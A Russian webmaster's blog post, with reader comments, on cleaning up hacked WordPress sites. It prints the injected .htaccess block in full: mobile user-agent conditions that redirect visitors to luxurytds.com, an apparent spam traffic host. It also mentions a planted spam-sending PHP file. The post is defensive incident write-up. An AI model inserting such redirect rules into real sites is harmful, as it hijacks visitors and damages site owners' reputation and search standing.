Что делать если сайт заражен?

Регистрация доменов
Домен RU - 99 руб
Домен РФ - 99 руб
www.

Вчера у меня произошло не очень приятное происшествие - заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?

Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.

Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.

Что делать если сайт заражен?

 

Я уже писал как то о том, как найти вирус на сайте, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.

Что делать если сайт зараженТак как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.

Я тут же связался со службой поддержки хостинга:

 - У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.

Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле .htaccess, который находится в корне сайта, я обнаружил вот такой код:

RewriteEngine On
 RewriteBase /
 RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino [NC,OR]
 RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC]
 RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 [R,L]
 # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS

Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.

Читайте также:  Как перевести сайт на https?

К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:

 У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.

На что последовал ответ:

 "Заразили" только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.

Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?

Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.

Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.

Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress - это тот же Windows, и что с этим делать?

Смотрите так же видео по теме статьи:


Понравилась ИГРА? Возьми КОД, поставь себе на сайт и улучши поведенческие факторы!


5 комментариев уже оставлено!
  1. У меня была подобная ситуация (файл .htaccess переадресовывал только мобильный трафик на лохо-смс-сервис).

    Кроме того, что Вы нашли проблему, Вам ещё следовало бы:
    сохранить все логи доступа и ошибок за весь доступный период и внимательно их изучить;
    запросить у хостера логи доступа на ФТП;
    проверьте логи доступа в админку (если в админке есть файловый менеджер - у меня есть).

    Понятно, что для сайта с большой посещаемостью изучать эти логи то ещё занятие. Но оно того стоит - разные сканирования и попытки взлома: 1) заставляют разбухать файлы ошибок; 2) в логах доступа бросаются в глаза специфичные строчки.
    Если вообще ничего подозрительного не нашли, то надо внимательнее следить за поведением сайтов: хотя бы раз в день заходить на них с ПК и с мобильного устройства.

    Я для себя сделал программу, которая проверяет хэш суммы всех файлов и сравнивает их с эталонными - если какое-то изменение, то сразу шлёт письмо мне. Эту программу (пхп-скрипт) я "подцепил" к крону - проверяет раз в сутки.

    Я свою проблему связываю именно с хостером, т.к. я очень внимательно изучил логи - абсолютно ничего подозрительного. После того, как я жаловался хостеру и у меня это повторилось ещё раз - сервер хостера ушёл на профилактику и после этого проблема больше не повторялась. Кстати, до появления проблемы первый раз, тоже была "профилактика" - обновляли ОС или что-то такое.

    • Спасибо за советы. Мне кажется, что у меня просто дырявый хостинг, у них там регулярно doss атаки, через которые хакеры заражают сайты. Мне кажется, что лучше сменить хостинг и заменить все системные файлы вордпресс и заново установить плагины. Возможно куда то залит шелл и через него меня регулярно ломают.

  2. Сегодня опять мне как то запихнули этот вредоносный код во все .htaccess, даже в папку temp, поэтому при таких проблемах нужно пройтись по всем этим фалам.

    Так же я изменил права доступа у всех них на 444, чтобы невозможно было записать что то ещё.

    Глянем, что будет. Да, ещё код запихнули в single.php, такое ощущение, что они имеют доступ к моему сайту.

    Кстати, взлом произошел сразу после того, как я добавил на сайт код advmaker.net может конечно совпадение, но я читал не раз, что часто через банерные сети ломают сайты.

Написать комментарий

Опубликовано © Блокнот вебмастера